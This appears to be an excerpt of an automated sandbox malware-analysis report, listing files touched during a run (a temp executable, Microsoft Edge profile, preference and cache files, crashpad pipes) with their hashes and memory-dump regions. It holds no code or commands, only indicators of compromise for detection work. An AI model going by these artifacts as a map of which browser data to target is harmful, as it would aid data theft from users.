C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe

MD5 f957b03435205ab6bcb64a6c82c00235
SHA1 dea886045a85b648462c780420b8ed7d582babf1
SHA256 2bbd5f2bbc1fc713cf56184058bf64642562d050e3f5f11d0bd514563905583f
SHA512 7d9933d1a4a7395dde18a2c3d64e56abace177f95830f241ae928b9ffd2f2bc7316167296e279148a8ce67489d54fcbee5bcfdada898e3bb0051896cf163a4c7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe

MD5 f957b03435205ab6bcb64a6c82c00235
SHA1 dea886045a85b648462c780420b8ed7d582babf1
SHA256 2bbd5f2bbc1fc713cf56184058bf64642562d050e3f5f11d0bd514563905583f
SHA512 7d9933d1a4a7395dde18a2c3d64e56abace177f95830f241ae928b9ffd2f2bc7316167296e279148a8ce67489d54fcbee5bcfdada898e3bb0051896cf163a4c7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

\??\pipe\LOCAL\crashpad_2468_ETAJJSHALPEBDLKD

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_3848_DLDNRBXUGFIHYFDB

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

\??\pipe\LOCAL\crashpad_3284_BFWMJRNFTBLSHZXU

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_1936_LMOOQNHGGQNPTRVV

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_4856_NPORTNBLUXEHAHYB

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_4444_AUXAZNFVEFYPNJKL

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

\??\pipe\LOCAL\crashpad_180_XYSONZWOZAVBKHSY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 cfbb3d3deca5b77ad5d69cad7bd529f2
SHA1 1e83c12931ffa39585c1ffbb5a50406b4fb443ce
SHA256 3adfb69154f560d5b68eab4c936eecf0740b9294945818118a758a4cc02569bc
SHA512 b7862603e5b2fd0424a93105e1cbabee0bd30516b1f5ea8a5f56a25b3586b650d6e411361263a8dd50ce3eda5dc7ee45c1254b51b6ff4b83fae4a44a302dd76c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 467ebfc68255000d26452b1f83983c23
SHA1 2a5e0843b519d5871673a25f8cc69f2a1e5b303f
SHA256 94fd0031cfc5e918e0e75d349c7f77b72a630e72a19bfe1749416c46b8630338
SHA512 23d6da7a9f256290d1d72b55693675ca4633c65e536359f6229c40fcc16a095e1b5c73e2de05152a27d949e1460727fb4c836c550761075e9025f94536057cee

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 467ebfc68255000d26452b1f83983c23
SHA1 2a5e0843b519d5871673a25f8cc69f2a1e5b303f
SHA256 94fd0031cfc5e918e0e75d349c7f77b72a630e72a19bfe1749416c46b8630338
SHA512 23d6da7a9f256290d1d72b55693675ca4633c65e536359f6229c40fcc16a095e1b5c73e2de05152a27d949e1460727fb4c836c550761075e9025f94536057cee

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c5e59086e1eb4a462ed7da5fb0f22d46
SHA1 e8b434aaaf8f1c7d24cd56d51e4bd8e1608d7c8f
SHA256 c57ce334c969530a31b1d710ec956d43d2d58e4dca35bd99764dbfc445b1e3c5
SHA512 a522eaacba4fa0dd9d3c9eb72ff5a2bd9f456421712e8ebf9d93c9eb944abace660fd36a13f1dcb035b49d2e3e5e17f74aed2d3c8c6030cc7daa1b66c2f21bdd

\??\pipe\LOCAL\crashpad_3156_IEERIGUKAIVVTVJW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c5e59086e1eb4a462ed7da5fb0f22d46
SHA1 e8b434aaaf8f1c7d24cd56d51e4bd8e1608d7c8f
SHA256 c57ce334c969530a31b1d710ec956d43d2d58e4dca35bd99764dbfc445b1e3c5
SHA512 a522eaacba4fa0dd9d3c9eb72ff5a2bd9f456421712e8ebf9d93c9eb944abace660fd36a13f1dcb035b49d2e3e5e17f74aed2d3c8c6030cc7daa1b66c2f21bdd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 8356afcf15c492cf9b1ad5be1d04435a
SHA1 3daec3a336c00c638f230991580db8364f8c7450
SHA256 da0d6fdce1a50cde7d0fe6061dba0c097422ed1f2e4fd1760651cb9ca90f9417
SHA512 7ddd6eeb483ff75a193a893102cf5627d10c772bb079b66abd8a3be447fc02502c68449c3feb3b8296ba2b5ac19eca3b92066db814681844ef8a3396e0a6be75

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\d0f7ddc6-d7b7-4c11-b908-afb6617a394a.tmp

MD5 593018db6ec548011c455a98d875a6aa
SHA1 600342e60fd02b57b93d20fb6f61e720a78d338a
SHA256 b1c6fd1cf912580170e151254622ca5f983ef296692cb63d2a3f5dc9cd71d5b3
SHA512 d96e5a0332f1c0be5a8179062bfbed2d1cbd9329c30309436fad2ac8ae785a740afb9f3b1af21e15a1d563d13aa2f95e46e98adea255c4bf9b40d13c77fc24ed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 25f99e3098278f329668e5123078c69e
SHA1 5c6abb5820d4e1cb09814a178e6ab53b60f6fe77
SHA256 2b0986adb41501d145a89da9c60e8241e9dcd58c52163c82756fa37e1e277f7d
SHA512 0d38325c49c7333ebc43b8368f736bcd6b504c6798bb51b0e3aa1000cda73058cfa8a6f12db3f8a096ef4342f063f1a92feea0fe33eb50056ea3148d371cd488

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 258f50a122518b70b92008fa5868798e
SHA1 a53f645a51298e70a3f45bbedef49cb4588e5256
SHA256 e86be2f25ee6bc4d60397450e05923d083ef0600500e24fa88e5d15a4aa482a8
SHA512 a0338e6f23a8e8fd2807749df48fee464f9ec654960facc4c6562618eb5ec83025a2ad315e184504aa3f4de8e6894e91e5438854ed6520a74ce142fb42cb3192

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 593018db6ec548011c455a98d875a6aa
SHA1 600342e60fd02b57b93d20fb6f61e720a78d338a
SHA256 b1c6fd1cf912580170e151254622ca5f983ef296692cb63d2a3f5dc9cd71d5b3
SHA512 d96e5a0332f1c0be5a8179062bfbed2d1cbd9329c30309436fad2ac8ae785a740afb9f3b1af21e15a1d563d13aa2f95e46e98adea255c4bf9b40d13c77fc24ed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ea21719db4a883fd4dbb999dfd5cacd2
SHA1 7e504dd659929aa3f60782b11578ca9f6444471d
SHA256 10007316018139292b0ee06409b44c6eaf54941612896c283b4b92732bd71f07
SHA512 8013ba921377bef1468e13fb251a4b177421c58ebbc22ba07559f71f35ccea940c45edfcc9662831b1c8a056062e8c02dcf1ad7a3fb85f004206c7c60f723981

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\008c4491-110a-4c16-b7ed-c4fcd5ffc6a9.tmp

MD5 ea21719db4a883fd4dbb999dfd5cacd2
SHA1 7e504dd659929aa3f60782b11578ca9f6444471d
SHA256 10007316018139292b0ee06409b44c6eaf54941612896c283b4b92732bd71f07
SHA512 8013ba921377bef1468e13fb251a4b177421c58ebbc22ba07559f71f35ccea940c45edfcc9662831b1c8a056062e8c02dcf1ad7a3fb85f004206c7c60f723981

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\eb639689-8e6e-4a68-8f59-03bc0965df41.tmp

MD5 8356afcf15c492cf9b1ad5be1d04435a
SHA1 3daec3a336c00c638f230991580db8364f8c7450
SHA256 da0d6fdce1a50cde7d0fe6061dba0c097422ed1f2e4fd1760651cb9ca90f9417
SHA512 7ddd6eeb483ff75a193a893102cf5627d10c772bb079b66abd8a3be447fc02502c68449c3feb3b8296ba2b5ac19eca3b92066db814681844ef8a3396e0a6be75

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 25f99e3098278f329668e5123078c69e
SHA1 5c6abb5820d4e1cb09814a178e6ab53b60f6fe77
SHA256 2b0986adb41501d145a89da9c60e8241e9dcd58c52163c82756fa37e1e277f7d
SHA512 0d38325c49c7333ebc43b8368f736bcd6b504c6798bb51b0e3aa1000cda73058cfa8a6f12db3f8a096ef4342f063f1a92feea0fe33eb50056ea3148d371cd488

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 cfbb3d3deca5b77ad5d69cad7bd529f2
SHA1 1e83c12931ffa39585c1ffbb5a50406b4fb443ce
SHA256 3adfb69154f560d5b68eab4c936eecf0740b9294945818118a758a4cc02569bc
SHA512 b7862603e5b2fd0424a93105e1cbabee0bd30516b1f5ea8a5f56a25b3586b650d6e411361263a8dd50ce3eda5dc7ee45c1254b51b6ff4b83fae4a44a302dd76c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6276613a51dae3b747451bc05e24edfa
SHA1 96ff591013fc8d378a9b37ea580d8ec6e98bbde5
SHA256 d17c0519716f5fa61ccf7289220c5e8917a36fbb29e48a86bb1122c9e3fcafb0
SHA512 dc84cd5df4867849039ecea2c98b1aeb435399b9503b1384159b2d08fe180b9f3daadc98f55c6ab28faa1e66dea8abfa4e702232a7027d933b0eca91fcf6b5f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 79a3c1c557fdc254250dc05440eeb6e7
SHA1 f2badb1af7586b451b93082865540b3a38c07a5f
SHA256 468f567aa19160ce6dc2dd5fdea97e6bd273cd2181aab7476950ffc273e5744c
SHA512 854c5ed4dd91c8f01001240cb033e183662357b8969be1cde39bec5cbbd7f8ab7931ff2595d2d1a70026752138de42c2fd74a21390eeb3fb89d0bf7a7eed5cc0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 258f50a122518b70b92008fa5868798e
SHA1 a53f645a51298e70a3f45bbedef49cb4588e5256
SHA256 e86be2f25ee6bc4d60397450e05923d083ef0600500e24fa88e5d15a4aa482a8
SHA512 a0338e6f23a8e8fd2807749df48fee464f9ec654960facc4c6562618eb5ec83025a2ad315e184504aa3f4de8e6894e91e5438854ed6520a74ce142fb42cb3192

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 79a3c1c557fdc254250dc05440eeb6e7
SHA1 f2badb1af7586b451b93082865540b3a38c07a5f
SHA256 468f567aa19160ce6dc2dd5fdea97e6bd273cd2181aab7476950ffc273e5744c
SHA512 854c5ed4dd91c8f01001240cb033e183662357b8969be1cde39bec5cbbd7f8ab7931ff2595d2d1a70026752138de42c2fd74a21390eeb3fb89d0bf7a7eed5cc0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c5e59086e1eb4a462ed7da5fb0f22d46
SHA1 e8b434aaaf8f1c7d24cd56d51e4bd8e1608d7c8f
SHA256 c57ce334c969530a31b1d710ec956d43d2d58e4dca35bd99764dbfc445b1e3c5
SHA512 a522eaacba4fa0dd9d3c9eb72ff5a2bd9f456421712e8ebf9d93c9eb944abace660fd36a13f1dcb035b49d2e3e5e17f74aed2d3c8c6030cc7daa1b66c2f21bdd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 593018db6ec548011c455a98d875a6aa
SHA1 600342e60fd02b57b93d20fb6f61e720a78d338a
SHA256 b1c6fd1cf912580170e151254622ca5f983ef296692cb63d2a3f5dc9cd71d5b3
SHA512 d96e5a0332f1c0be5a8179062bfbed2d1cbd9329c30309436fad2ac8ae785a740afb9f3b1af21e15a1d563d13aa2f95e46e98adea255c4bf9b40d13c77fc24ed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 467ebfc68255000d26452b1f83983c23
SHA1 2a5e0843b519d5871673a25f8cc69f2a1e5b303f
SHA256 94fd0031cfc5e918e0e75d349c7f77b72a630e72a19bfe1749416c46b8630338
SHA512 23d6da7a9f256290d1d72b55693675ca4633c65e536359f6229c40fcc16a095e1b5c73e2de05152a27d949e1460727fb4c836c550761075e9025f94536057cee

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 afe2621974e48c3b16e96492d285ef01
SHA1 5222d7335ff3a4e746f12bd0dc6e4b1c7012161e
SHA256 4b9e3e2acaa6bf768b8476e34cd300fa21b988433cae64322bc7118481a38eef
SHA512 646a83f72f0c368dc08ab17ffe108cb98bc3a14a75815c6a35b33f617f4d94607164c43156de97b9f3829d4abd424fb0a656eadc4441642c15943a83ab50046b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6e0a2fc43676b89e8b649917a3e803d2
SHA1 0ec6991d8deb4184432518351f70474eda1b0e81
SHA256 e87f5a360da684e339f1fbe7279f56ea2d71a8178adf187601ec42db83d74136
SHA512 135a820bc70fca66df85897250fea4f00d07aa68447f239841adf7632986ceff1543329d432be17dacbafdacf758cd1f2e20f5bee296321f76e7cb33754cb6a4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ca942186a4e4bd39d914c5d18b3a47d5
SHA1 04aa96c3f8d2ab03a191536ae441364ec7269b48
SHA256 cc8500366e500124f345f6c5bfe17fe22779bac076e10e6e218bc53b7baf8a0b
SHA512 65c354923284b6328e8c2d8a4f7ede72e692647015f27ce1f1a751da2f7e7fd6080b7b4ee6953b0d6bfa4f2a43d603e5c3c0510483bff33e0fb8652348341f28

memory/8632-372-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 f1881400134252667af6731236741098
SHA1 6fbc4f34542d449afdb74c9cfd4a6d20e6cdc458
SHA256 d6fcec1880d69aaa0229f515403c1a5ac82787f442c37f1c0c96c82ec6c15b75
SHA512 18b9ac92c396a01b6662a4a8a21b995d456716b70144a136fced761fd0a84c99e8bd0afb9585625809b87332da75727b82a07b151560ea253a3b8c241b799450

memory/8632-380-0x0000000000400000-0x0000000000433000-memory.dmp

memory/8632-381-0x0000000000400000-0x0000000000433000-memory.dmp

memory/8632-384-0x0000000000400000-0x0000000000433000-memory.dmp

memory/8708-385-0x0000000000400000-0x000000000040B000-memory.dmp

memory/8708-419-0x0000000000400000-0x000000000040B000-memory.dmp

memory/3216-417-0x0000000001F30000-0x0000000001F46000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 704461f36ebf76273cd8bdfc6ed6d702
SHA1 5072c75fda593ef85591f18b18790697fcb3365e
SHA256 36d590756f0e097bdb3b4c5b719dd8220dd12628259c6817d3e6a5efa64f03df
SHA512 280aea463913605a7687ec4da69a309b66c00133e66bc1306f47bd2b8406f4f35c674801af007c4e7a6869e8af0b2b9cae0e3fa2ddc282e9082671604985513c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58723d.TMP

MD5 773185ad1f158f6fe8be4103badf79b3
SHA1 109b844af1ece09fd41c86e7d568a2050e7c3c9d
SHA256 a722aaa3ed82bb09f144d458716e1a237a5c301dfdbf060f3a3e933ee44d4b20
SHA512 72b686d372fd0840335205a1673bfef869765f39f8158f2bfdc8848d61b04adc701bb53fd14cf19b2c656217283e5b3a211d6c22acfe7d7330854fe6850510bb

memory/6400-495-0x0000000000400000-0x000000000043C000-memory.dmp

memory/6400-500-0x00000000740D0000-0x0000000074880000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

MD5 923a543cc619ea568f91b723d9fb1ef0
SHA1 6f4ade25559645c741d7327c6e16521e43d7e1f9
SHA256 bf7344209edb1be5a2886c425cf6334a102d76cbea1471fd50171e2ee92877cd
SHA512 a4153751761cd67465374828b0514d7773b8c4ed37779d1ecfd4f19be4faa171585c8ee0b4db59b556399d5d2b9809ba87e04d4715e9d090e1f488d02219d555

memory/6400-512-0x0000000007D80000-0x0000000008324000-memory.dmp

memory/6400-515-0x00000000078B0000-0x0000000007942000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

memory/6400-530-0x0000000007AD0000-0x0000000007AE0000-memory.dmp

memory/6400-535-0x0000000007AA0000-0x0000000007AAA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

MD5 fdbf5bcfbb02e2894a519454c232d32f
SHA1 5e225710e9560458ac032ab80e24d0f3cb81b87a
SHA256 d9315d0678ac213bbe2c1de27528f82fd40dbff160f5a0c19850f891da29ea1c
SHA512 9eb86ebb1b50074df9bd94f7660df6f362b5a46411b35ce820740f629f8ef77f0b49a95c5550441a7db2b2638f0ed3d0204cb8f8c76391c05401506833b8c916

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f

MD5 4e08109ee6888eeb2f5d6987513366bc
SHA1 86340f5fa46d1a73db2031d80699937878da635e
SHA256 bf44187e1683e78d3040bcef6263e25783c6936096ff0a621677d411dd9d1339
SHA512 4e477fd9e58676c0e00744dbe3421e528dd2faeca2ab998ebbeb349b35bb3711dcf78d8c9e7adba66b4d681d1982c31cac42024c8b19e19537a5615dac39c661

memory/6400-544-0x0000000008950000-0x0000000008F68000-memory.dmp

